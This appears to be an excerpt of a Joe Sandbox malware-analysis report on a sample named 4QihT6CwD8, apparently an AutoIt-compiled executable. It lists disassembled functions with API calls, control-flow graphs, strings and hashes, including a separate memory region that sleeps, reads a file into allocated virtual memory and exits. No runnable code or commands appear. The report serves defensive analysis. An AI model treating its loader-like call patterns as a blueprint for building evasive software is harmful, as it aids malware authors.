                                  control_flow_graph 410 39065b-39068b call 39042f 413 39068d-390698 call 37f2c6 410->413 414 3906a6-3906b2 call 385221 410->414 419 39069a-3906a1 call 37f2d9 413->419 420 3906cb-390714 call 39039a 414->420 421 3906b4-3906c9 call 37f2c6 call 37f2d9 414->421 430 39097d-390983 419->430 428 390781-39078a GetFileType 420->428 429 390716-39071f 420->429 421->419 434 39078c-3907bd GetLastError call 37f2a3 CloseHandle 428->434 435 3907d3-3907d6 428->435 432 390721-390725 429->432 433 390756-39077c GetLastError call 37f2a3 429->433 432->433 439 390727-390754 call 39039a 432->439 433->419 434->419 449 3907c3-3907ce call 37f2d9 434->449 437 3907d8-3907dd 435->437 438 3907df-3907e5 435->438 442 3907e9-390837 call 38516a 437->442 438->442 443 3907e7 438->443 439->428 439->433 452 390839-390845 call 3905ab 442->452 453 390847-39086b call 39014d 442->453 443->442 449->419 452->453 459 39086f-390879 call 3886ae 452->459 460 39086d 453->460 461 39087e-3908c1 453->461 459->430 460->459 462 3908c3-3908c7 461->462 463 3908e2-3908f0 461->463 462->463 465 3908c9-3908dd 462->465 466 39097b 463->466 467 3908f6-3908fa 463->467 465->463 466->430 467->466 469 3908fc-39092f CloseHandle call 39039a 467->469 472 390931-39095d GetLastError call 37f2a3 call 385333 469->472 473 390963-390977 469->473 472->473 473->466
                                  APIs
                                    • Part of subcall function 0039039A: CreateFileW.KERNELBASE(00000000,00000000,?,00390704,?,?,00000000,?,00390704,00000000,0000000C), ref: 003903B7
                                  • GetLastError.KERNEL32 ref: 0039076F
                                  • __dosmaperr.LIBCMT ref: 00390776
                                  • GetFileType.KERNELBASE(00000000), ref: 00390782
                                  • GetLastError.KERNEL32 ref: 0039078C
                                  • __dosmaperr.LIBCMT ref: 00390795
                                  • CloseHandle.KERNEL32(00000000), ref: 003907B5
                                  • CloseHandle.KERNEL32(?), ref: 003908FF
                                  • GetLastError.KERNEL32 ref: 00390931
                                  • __dosmaperr.LIBCMT ref: 00390938
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: 03a53eb9e972eabbf3fb9b1c1b8ee64f098efb090e908938fc11864f88f2639f
                                  • Instruction ID: 2a9f89cf34c8d26404cc98ac1d466063029679163ea6b65ad9679683e0cddcb0
                                  • Opcode Fuzzy Hash: 03a53eb9e972eabbf3fb9b1c1b8ee64f098efb090e908938fc11864f88f2639f
                                  • Instruction Fuzzy Hash: 4EA11636A141088FDF2EAF68D891BAE7BE4AB06320F154159F8159F2D2DB359C13CB91
                                  Function 0035344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00353A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00421418,?,00352E7F,?,?,?,00000000), ref: 00353A78
                                    • Part of subcall function 00353357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00353379
                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0035356A
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0039318D
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003931CE
                                  • RegCloseKey.ADVAPI32(?), ref: 00393210
                                  • _wcslen.LIBCMT ref: 00393277
                                  • _wcslen.LIBCMT ref: 00393286
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                  • API String ID: 98802146-2727554177
                                  • Opcode ID: 35b1d0f3974b946b100e2a3d2f1c2ea2caabfcf6e5a687644863ecb8ec4c9792
                                  • Instruction ID: 032bb0184472ffb94a5261b03bf9ed1725d164b8a1fea93fc9ebca41f677d241
                                  • Opcode Fuzzy Hash: 35b1d0f3974b946b100e2a3d2f1c2ea2caabfcf6e5a687644863ecb8ec4c9792
                                  • Instruction Fuzzy Hash: 5471AF71504301AEC726DF29DD819ABBBE8FF85340F80492EF845871B0EB749A49CB55
                                  Function 00352B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 00352B8E
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00352B9D
                                  • LoadIconW.USER32(00000063), ref: 00352BB3
                                  • LoadIconW.USER32(000000A4), ref: 00352BC5
                                  • LoadIconW.USER32(000000A2), ref: 00352BD7
                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00352BEF
                                  • RegisterClassExW.USER32(?), ref: 00352C40
                                    • Part of subcall function 00352CD4: GetSysColorBrush.USER32(0000000F), ref: 00352D07
                                    • Part of subcall function 00352CD4: RegisterClassExW.USER32(00000030), ref: 00352D31
                                    • Part of subcall function 00352CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00352D42
                                    • Part of subcall function 00352CD4: InitCommonControlsEx.COMCTL32(?), ref: 00352D5F
                                    • Part of subcall function 00352CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00352D6F
                                    • Part of subcall function 00352CD4: LoadIconW.USER32(000000A9), ref: 00352D85
                                    • Part of subcall function 00352CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00352D94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                  • String ID: #$0$AutoIt v3
                                  • API String ID: 423443420-4155596026
                                  • Opcode ID: 66a48278e40296779f848e4e3ea1ebb819fdead06c1ecd941244ab93421dee2a
                                  • Instruction ID: 8c9f5dc89f3fdcc2e765608901b3b09d2b25baea1b94aefd954899c5b0fca22d
                                  • Opcode Fuzzy Hash: 66a48278e40296779f848e4e3ea1ebb819fdead06c1ecd941244ab93421dee2a
                                  • Instruction Fuzzy Hash: 4E213D74E10354AFEB21DFA5EC85A9D7FB6FB18B50F40013AE901A66B0D3B11542CF98
                                  Function 0035B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                                  Download Yara Rule
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 0035BB4E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Init_thread_footer
                                  • String ID: p#B$p#B$p#B$p#B$p%B$p%B$x#B$x#B
                                  • API String ID: 1385522511-564750839
                                  • Opcode ID: e9f704d2b8f4c741f5580fe47aa308e8c7e1502f7b33f5a44ae691e56d209c48
                                  • Instruction ID: 1fe763a06d24d4b94fba2317e7596000475c57630d67db86989b8379587904ea
                                  • Opcode Fuzzy Hash: e9f704d2b8f4c741f5580fe47aa308e8c7e1502f7b33f5a44ae691e56d209c48
                                  • Instruction Fuzzy Hash: 3B32CD34A00209EFCB26CF64C894FBEB7B9EF45301F168059ED15AB2A1C7B4AD45CB91
                                  Function 00353170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 758 353170-353185 759 3531e5-3531e7 758->759 760 353187-35318a 758->760 759->760 763 3531e9 759->763 761 35318c-353193 760->761 762 3531eb 760->762 764 353265-35326d PostQuitMessage 761->764 765 353199-35319e 761->765 767 392dfb-392e23 call 3518e2 call 36e499 762->767 768 3531f1-3531f6 762->768 766 3531d0-3531d8 DefWindowProcW 763->766 773 353219-35321b 764->773 770 3531a4-3531a8 765->770 771 392e7c-392e90 call 3bbf30 765->771 772 3531de-3531e4 766->772 803 392e28-392e2f 767->803 774 35321d-353244 SetTimer RegisterWindowMessageW 768->774 775 3531f8-3531fb 768->775 779 392e68-392e72 call 3bc161 770->779 780 3531ae-3531b3 770->780 771->773 797 392e96 771->797 773->772 774->773 781 353246-353251 CreatePopupMenu 774->781 776 353201-353214 KillTimer call 3530f2 call 353c50 775->776 777 392d9c-392d9f 775->777 776->773 789 392da1-392da5 777->789 790 392dd7-392df6 MoveWindow 777->790 793 392e77 779->793 786 392e4d-392e54 780->786 787 3531b9-3531be 780->787 781->773 786->766 791 392e5a-392e63 call 3b0ad7 786->791 795 3531c4-3531ca 787->795 796 353253-353263 call 35326f 787->796 798 392da7-392daa 789->798 799 392dc6-392dd2 SetFocus 789->799 790->773 791->766 793->773 795->766 795->803 796->773 797->766 798->795 804 392db0-392dc1 call 3518e2 798->804 799->773 803->766 807 392e35-392e48 call 3530f2 call 353837 803->807 804->773 807->766
                                  APIs
                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0035316A,?,?), ref: 003531D8
                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,0035316A,?,?), ref: 00353204
                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00353227
                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0035316A,?,?), ref: 00353232
                                  • CreatePopupMenu.USER32 ref: 00353246
                                  • PostQuitMessage.USER32(00000000), ref: 00353267
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                  • String ID: TaskbarCreated
                                  • API String ID: 129472671-2362178303
                                  • Opcode ID: 8410c923e6e0e571d5b961b18035d614f3ad92c773fc34ed704182830240bff5
                                  • Instruction ID: c22b051e0029fcb31154ee952f0ef6ecd54236a159c8698b74a2059d9b3a0a73
                                  • Opcode Fuzzy Hash: 8410c923e6e0e571d5b961b18035d614f3ad92c773fc34ed704182830240bff5
                                  • Instruction Fuzzy Hash: 17415630310A44AADB276B38DC49F793A1DE715382F454625FD128A5F1CB70CB49C7A9
                                  Function 0035DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D%B$D%B$D%B$D%B$D%BD%B$Variable must be of type 'Object'.
                                  • API String ID: 0-2155691291
                                  • Opcode ID: 44b3fe05050f676f8383e07dd857f38b00acc8b1163a6a0ffba2c26cc21f23d4
                                  • Instruction ID: 843b94b7492cfb5b19bcc2f831d9dc52cff3331fb289a3060fcc6613baf3db83
                                  • Opcode Fuzzy Hash: 44b3fe05050f676f8383e07dd857f38b00acc8b1163a6a0ffba2c26cc21f23d4
                                  • Instruction Fuzzy Hash: 9EC29975E00214DFCB2ACF58C880EADB7B5FF09301F258569E906AB2A1D375EE45CB91
                                  Function 01142600 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1324 1142600-11426ae call 1140000 1327 11426b5-11426db call 1143510 CreateFileW 1324->1327 1330 11426e2-11426f2 1327->1330 1331 11426dd 1327->1331 1339 11426f4 1330->1339 1340 11426f9-1142713 VirtualAlloc 1330->1340 1332 114282d-1142831 1331->1332 1333 1142873-1142876 1332->1333 1334 1142833-1142837 1332->1334 1336 1142879-1142880 1333->1336 1337 1142843-1142847 1334->1337 1338 1142839-114283c 1334->1338 1343 11428d5-11428ea 1336->1343 1344 1142882-114288d 1336->1344 1345 1142857-114285b 1337->1345 1346 1142849-1142853 1337->1346 1338->1337 1339->1332 1341 1142715 1340->1341 1342 114271a-1142731 ReadFile 1340->1342 1341->1332 1347 1142733 1342->1347 1348 1142738-1142778 VirtualAlloc 1342->1348 1351 11428ec-11428f7 VirtualFree 1343->1351 1352 11428fa-1142902 1343->1352 1349 1142891-114289d 1344->1349 1350 114288f 1344->1350 1353 114285d-1142867 1345->1353 1354 114286b 1345->1354 1346->1345 1347->1332 1355 114277f-114279a call 1143760 1348->1355 1356 114277a 1348->1356 1357 11428b1-11428bd 1349->1357 1358 114289f-11428af 1349->1358 1350->1343 1351->1352 1353->1354 1354->1333 1364 11427a5-11427af 1355->1364 1356->1332 1361 11428bf-11428c8 1357->1361 1362 11428ca-11428d0 1357->1362 1360 11428d3 1358->1360 1360->1336 1361->1360 1362->1360 1365 11427b1-11427e0 call 1143760 1364->1365 1366 11427e2-11427f6 call 1143570 1364->1366 1365->1364 1371 11427f8 1366->1371 1372 11427fa-11427fe 1366->1372 1371->1332 1374 1142800-1142804 FindCloseChangeNotification 1372->1374 1375 114280a-114280e 1372->1375 1374->1375 1376 1142810-114281b VirtualFree 1375->1376 1377 114281e-1142827 1375->1377 1376->1377 1377->1327 1377->1332
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011426D1
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011428F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateFileFreeVirtual
                                  • String ID:
                                  • API String ID: 204039940-0
                                  • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                  • Instruction ID: c0a737484a59649ea9efb8665d1762f7689c765d295bb120c42cfa781522afe6
                                  • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                  • Instruction Fuzzy Hash: DFA10A74E00209EBEB18CFA4D854BEEBBB5FF48705F208159F611BB280D7759A81CB95
                                  Function 00352C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1388 352c63-352cd3 CreateWindowExW * 2 ShowWindow * 2
                                  APIs
                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00352C91
                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00352CB2
                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00351CAD,?), ref: 00352CC6
                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00351CAD,?), ref: 00352CCF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$CreateShow
                                  • String ID: AutoIt v3$edit
                                  • API String ID: 1584632944-3779509399
                                  • Opcode ID: f3a63dd4b7f26348b4e1482bf7b239bf903eb8cd0ef11cb233c1d23b9df7ec0f
                                  • Instruction ID: 4dc7d36c127335c8e3b5a77a3d3f11e9fdecf4f7f52047acb08d242e1ef6ed50
                                  • Opcode Fuzzy Hash: f3a63dd4b7f26348b4e1482bf7b239bf903eb8cd0ef11cb233c1d23b9df7ec0f
                                  • Instruction Fuzzy Hash: 17F017756502947AEB314713AC48E7B2EBED7DAF50F41102AFD00A61B0C2710842DAB8
                                  Function 011423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1503 11423b0-11424f6 call 1140000 call 11422a0 CreateFileW 1510 11424fd-114250d 1503->1510 1511 11424f8 1503->1511 1514 1142514-114252e VirtualAlloc 1510->1514 1515 114250f 1510->1515 1512 11425ad-11425b2 1511->1512 1516 1142530 1514->1516 1517 1142532-1142549 ReadFile 1514->1517 1515->1512 1516->1512 1518 114254d-1142587 call 11422e0 call 11412a0 1517->1518 1519 114254b 1517->1519 1524 11425a3-11425ab ExitProcess 1518->1524 1525 1142589-114259e call 1142330 1518->1525 1519->1512 1524->1512 1525->1524
                                  APIs
                                    • Part of subcall function 011422A0: Sleep.KERNELBASE(000001F4), ref: 011422B1
                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011424EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateFileSleep
                                  • String ID: OHSIFFN0WHUKG0E9
                                  • API String ID: 2694422964-3423250838
                                  • Opcode ID: a2c183fb52239c0dd4f212402d088d32efb198aa2e201119edeae8b3b0caf256
                                  • Instruction ID: 691a658a8df87ac4b6d638b024f23a3dba415288c2062c50db1d32dd95ece314
                                  • Opcode Fuzzy Hash: a2c183fb52239c0dd4f212402d088d32efb198aa2e201119edeae8b3b0caf256
                                  • Instruction Fuzzy Hash: 29519330D14248EBEF15DBE4D854BEEBB75AF58700F004598E209BB2C0D7B91B85CBA6
                                  Function 003C2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1527 3c2947-3c29b9 call 391f50 call 3c25d6 call 36fe0b call 355722 call 3c274e call 35511f call 375232 1542 3c2a6c-3c2a73 call 3c2e66 1527->1542 1543 3c29bf-3c29c6 call 3c2e66 1527->1543 1548 3c2a7c 1542->1548 1549 3c2a75-3c2a77 1542->1549 1543->1549 1550 3c29cc-3c2a6a call 37d583 call 374983 call 379038 call 37d583 call 379038 * 2 1543->1550 1553 3c2a7f-3c2b3a call 3550f5 * 8 call 3c3017 call 37e5eb 1548->1553 1551 3c2cb6-3c2cb7 1549->1551 1550->1553 1554 3c2cd5-3c2cdb 1551->1554 1592 3c2b3c-3c2b3e 1553->1592 1593 3c2b43-3c2b5e call 3c2792 1553->1593 1557 3c2cdd-3c2ce8 call 36fdcd call 36fe14 1554->1557 1558 3c2cf0-3c2cf6 1554->1558 1570 3c2ced 1557->1570 1570->1558 1592->1551 1596 3c2b64-3c2b6c 1593->1596 1597 3c2bf0-3c2bfc call 37e678 1593->1597 1598 3c2b6e-3c2b72 1596->1598 1599 3c2b74 1596->1599 1604 3c2bfe-3c2c0d DeleteFileW 1597->1604 1605 3c2c12-3c2c16 1597->1605 1601 3c2b79-3c2b97 call 3550f5 1598->1601 1599->1601 1611 3c2b99-3c2b9e 1601->1611 1612 3c2bc1-3c2bd7 call 3c211d call 37dbb3 1601->1612 1604->1551 1607 3c2c18-3c2c7e call 3c25d6 call 37d2eb * 2 call 3c22ce 1605->1607 1608 3c2c91-3c2ca5 CopyFileW 1605->1608 1609 3c2cb9-3c2ccf DeleteFileW call 3c2fd8 1607->1609 1632 3c2c80-3c2c8f DeleteFileW 1607->1632 1608->1609 1610 3c2ca7-3c2cb4 DeleteFileW 1608->1610 1619 3c2cd4 1609->1619 1610->1551 1616 3c2ba1-3c2bb4 call 3c28d2 1611->1616 1627 3c2bdc-3c2be7 1612->1627 1625 3c2bb6-3c2bbf 1616->1625 1619->1554 1625->1612 1627->1596 1629 3c2bed 1627->1629 1629->1597 1632->1551
                                  APIs
                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C2C05
                                  • DeleteFileW.KERNEL32(?), ref: 003C2C87
                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003C2C9D
                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C2CAE
                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003C2CC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: File$Delete$Copy
                                  • String ID:
                                  • API String ID: 3226157194-0
                                  • Opcode ID: 9c75ee3cb596e81f4bc737b761b40ed2b397c6b6d98e2fff822602ab0e88bd36
                                  • Instruction ID: 1c11047a191f6380a7f1bd25305cf65bbd68348a0b247bbf05bee70979449cdf
                                  • Opcode Fuzzy Hash: 9c75ee3cb596e81f4bc737b761b40ed2b397c6b6d98e2fff822602ab0e88bd36
                                  • Instruction Fuzzy Hash: E0B13F71900119ABDF22DBA4CC85EDFBB7DEF49350F1040AAF909EB151EA359E448F61
                                  Function 00385AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
